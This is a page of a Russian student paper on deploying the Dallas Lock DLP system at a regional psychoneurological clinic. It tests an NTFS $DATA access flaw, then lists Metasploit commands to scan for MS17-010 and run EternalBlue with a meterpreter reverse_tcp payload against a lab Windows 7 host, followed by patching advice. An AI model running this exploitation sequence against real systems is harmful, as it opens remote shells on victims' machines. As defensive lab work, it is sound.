ВУЗ: Не указан
Категория: Не указан
Дисциплина: Не указана
Добавлен: 23.11.2023
Просмотров: 355
Скачиваний: 2
ВНИМАНИЕ! Если данный файл нарушает Ваши авторские права, то обязательно сообщите нам.
Внедрение DLP-системы
В соответствии с Приказом №17 ФСТЭК РФ, 20.12. Меры по защите технических средств должны исключать несанкционированный доступ к стационарным техническим средствам, обрабатывающим информацию, средствам, обеспечивающим функционирование ИС, и в помещения, в которых они постоянно расположены, защиту технических средств от внешних воздействий, а также защиту информации, представленной в виде информативных электрических сигналов и физических полей. В качестве решения необходимо воспользоваться DLP-системой.
В целях проверки ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от НСД, необходимо сделать следующее. Для начала на ОС Windows 7 установим систему Dallas Lock 8.0-C и Dallas
Lock Server. Создадим файл «test.txt» от имени администратора с содержанием «Hello, World!», затем запретим доступ к этому файлу всем пользователям и проверим чтение файла по имени и по атрибуту $DATA, под непривилегированным пользователем (рисунок 22).
Рисунок 22 - Создание файла «test.txt» от имени администратора
Первоначально устанавливаем разрешения, затем запускаем проверку (рисунок 23).
Рисунок 23 - Проверка уязвимости
Уязвимость зафиксирована: любой пользователь может просмотреть содержимое файла, игнорируя все установленные правила.
Далее рассмотрим способность DLP-системы противостоять атакам злоумышленника. Для этого
необходимо использовать еще не обновленную версию Windows 7, где уязвимость MS17-010 не устранена. На одно АРМ установим Dallas Lock 8.0-K (рисунок 24).
Рисунок 24 - Запуск Dallas Lock 8.0-K для проверки уязвимости На второе АРМ установим Dallas Lock Server (рисунок 25):
Рисунок 25 - Запуск Dallas Lock Server для проверки уязвимости
Далее настроим между ними локальную сеть. Затем к этой же сети подключим сервер ИС и с помощью MetaSploit framework попробуем провести тестирование уязвимости Windows 7, на которой установлен Dallas Lock Server. Перед этим необходимо узнать Ip-адреса хостов, находящихся в одной сети с Kali Linux. Но при настройке локальной сети мы использовали сетевой коммутатор, поэтому сеть необходимо настроит вручную.
Для этого необходимо:
-
открываем консоль и запускаем Postgresql: service postgresql start; -
запускаем Metasploit framework: msfconsole; -
выбираем, какой сканер будем использовать: use auxiliary/scanner/smb/smb_ms17_010; -
выбираем Ip-адрес, который будем сканировать: set RHOSTS 192.168.1.2; -
командой run запускаем сканер;
Получили, что данный хост уязвим, значит пробуем его поэксплуатировать. Для этого:
-
выбираем эксплойт, который будем использовать: use exploit/windows/smb/ms17_010_eternalblue; -
смотрим Ip-адрес АРМ: ifconfig; -
получили адрес 192.168.1.3; -
выбираем Ip-адрес хоста, с которого будет производиться эксплойт: set LHOST 192.168.1.3; -
выбираем Ip-адрес удаленного хоста, который мы будем эксплуатировать командой: set RHOST 192.168.1.2; -
выбираем полезную нагрузку, которая будет использоваться после успешного выполнения эксплойта: set payload windows/x64/meterpreter/reverse_tcp; -
запускаем эксплойт: exploit;
Вывод представлен на рисунке 26.
Рисунок 26 - Вывод команды «exploit»
Эксплойт реализовал доступ к системе, так как курсор в командной строке поменялся на meterpreter>. Это означает, что сессия meterpreter открыта и мы получили доступ к управлению Windows 7, то есть наш удаленный эксплойт работает. Соответственно, уязвимость актуальна т.к. данным способом может воспользоваться злоумышленник.
Из рисунка 27 видно, что Dallas Lock никак не отреагировал. Единственное, в соединениях межсетевого экрана появилось исходящее соединение. Но следует обратить внимание на то, что запрос с АРМ идет по 445 порту, а само подключение к удаленному компьютеру уже по 4444 порту.
Рисунок 27 - Исходящее соединение межсетевого экрана
По результатам проведенного исследования следует отметить, что для устранения данных уязвимостей и предотвращения атак злоумышленников необходимо провести следующие операции:
-
включить автоматическое обновление Microsoft Windows; -
провести автоматическое обновление СОВ Dallas lock и установить новые базы сигнатур (рисунок 28); -
настроить автоматическое обновление сигнатур СОВ Dallas Lock.
Рисунок 28 - Обновление новых баз сигнатур
После
выполнения данной процедуры настройки и корректной установки Dallas Lock необходимо повторно проверить систему.
- 1 ... 4 5 6 7 8 9 10 11 ... 15
Тестирование эффективности проекта системы защиты
-
Проверка эффективности проекта системы защиты
Настроенный проект защиты включает с состав DLP-систему, антивирус и межсетевой экран. Данные средства размещаются в сети
учреждения, обеспечивая комплексную защиту от внутренних и внешних угроз. Схема расположения компонентов защиты ГБУЗ ЯНАО
«Новоуренгойский психоневрологический диспансер» в сети представлена на рисунке 29.
Рисунок 29 – Схема сети после внедрения СЗИ
Эксплойт был вновь запущен и на этот раз уязвимости обнаружено не было – вирус не получил доступ к системе (рисунок 30).
Рисунок 30 – Ошибка при получении доступа с установленной СЗИ
После внедрения данной системы защиты были устранены угрозы, описанные в приложении. Система работает взаимосвязано и не требует обновления в данный момент.
Таким образом, настроив данные параметры можно обезопасить ИС ГБУЗ ЯНАО «Новоуренгойский психоневрологический диспансер» от возможного риска НСД, как со стороны посторонних лиц, так и со стороны недобросовестных сотрудников. Описанная СЗИ располагает широким функционалом, способным противостоять самым разнообразным угрозам и легко адаптируется под любую ИТ-инфраструктуру организации.
-
Нормативно-правовое обеспечение защиты информации
Общую структуру нормативной базы в области обеспечения информационной безопасности